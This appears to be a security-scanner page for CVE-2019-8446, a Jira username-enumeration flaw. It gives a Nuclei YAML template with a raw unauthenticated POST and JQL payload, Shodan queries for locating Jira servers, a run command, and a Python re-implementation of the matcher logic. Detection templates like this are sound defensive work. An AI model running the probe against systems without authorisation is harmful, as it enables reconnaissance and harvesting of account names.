Jira Improper Authorization
ID: CVE-2019-8446
Severity: medium
Author: dhiyaneshDk
Tags: cve,cve2019,jira,atlassian
Description
The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.
YAML Source
id: CVE-2019-8446

info:
  name: Jira Improper Authorization
  author: dhiyaneshDk
  severity: medium
  description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.
  impact: |
    This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Jira application.
  remediation: |
    Apply the latest security patches and updates provided by Atlassian to fix the vulnerability.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-69777
    - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/CyberTrashPanda/CVE-2019-8446
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-8446
    cwe-id: CWE-863
    epss-score: 0.15691
    epss-percentile: 0.95925
    cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: jira_server
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
  tags: cve,cve2019,jira,atlassian

http:
  - raw:
      - |
        POST /rest/issueNav/1/issueTable HTTP/1.1
        Host: {{Hostname}}
        Connection: Close
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        X-Atlassian-Token: no-check
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9

        {'jql':'project in projectsLeadByUser("{{randstr}}")'}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "the user does not exist"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d5d46349a93fd0b9fd8b476fcef9481bc48e7862cda5e142d887d625148dd525022100efadeed2647b4240868b7a85cef37fbb2f5850c3e9d86c6b981cb8cbff6da7cb:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-8446.yaml"
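To make the template's decision logic concrete, the following Python block is an added example, not Nuclei's own code and not part of the original page. It re-implements the semantics of the template's `word` and `status` matchers under `matchers-condition: and`, and runs them over constructed sample responses (a body that contains the "the user does not exist" phrase with a 200 status, a 401 from an instance that enforces authorisation, and a 200 whose body lacks the phrase). The response bodies are invented for illustration; they are not captured Jira output.

```python
# Added example: minimal re-implementation of how this template's matcher
# block is evaluated against an HTTP response. Not Nuclei's own code; it
# mirrors the `word` and `status` matcher types with `matchers-condition: and`.

from dataclasses import dataclass

# The matcher block of CVE-2019-8446.yaml, transcribed as Python data.
MATCHERS_CONDITION = "and"
MATCHERS = [
    {"type": "word", "part": "body", "words": ["the user does not exist"]},
    {"type": "status", "status": [200]},
]


@dataclass
class Response:
    status: int
    headers: str
    body: str


def match_word(matcher, resp):
    """Word matcher: true if any listed word occurs in the selected part
    (body by default, otherwise the raw headers)."""
    part = resp.body if matcher.get("part", "body") == "body" else resp.headers
    return any(word in part for word in matcher["words"])


def match_status(matcher, resp):
    """Status matcher: true if the response code is one of those listed."""
    return resp.status in matcher["status"]


MATCHER_TYPES = {"word": match_word, "status": match_status}


def evaluate(resp, matchers=MATCHERS, condition=MATCHERS_CONDITION):
    """Apply every matcher; 'and' requires all to fire, 'or' requires any."""
    results = [MATCHER_TYPES[m["type"]](m, resp) for m in matchers]
    return all(results) if condition == "and" else any(results)


# Constructed sample responses (illustrative, not real Jira output).
VULNERABLE = Response(
    200,
    "Content-Type: application/json",
    '{"errorMessages":["the user does not exist"],"errors":{}}',
)
PATCHED_401 = Response(
    401,
    "Content-Type: text/html",
    "<html><body>Authentication required</body></html>",
)
PATCHED_200 = Response(
    200,
    "Content-Type: text/html",
    "<html><body>Log in to continue</body></html>",
)

if __name__ == "__main__":
    for label, resp in (("vulnerable", VULNERABLE), ("patched/401", PATCHED_401), ("patched/200", PATCHED_200)):
        print(f"{label}: {'match' if evaluate(resp) else 'no match'}")
```

The point the `and` condition makes is that neither signal alone is evidence: a 200 from a login page at that path is not a finding, and the error phrase is only meaningful when the endpoint actually evaluated the unauthenticated JQL and returned it with a 200. A fixed instance fails the check on either leg, which is why a successful match is a reliable indicator that the 8.3.2 authorisation fix is not in place.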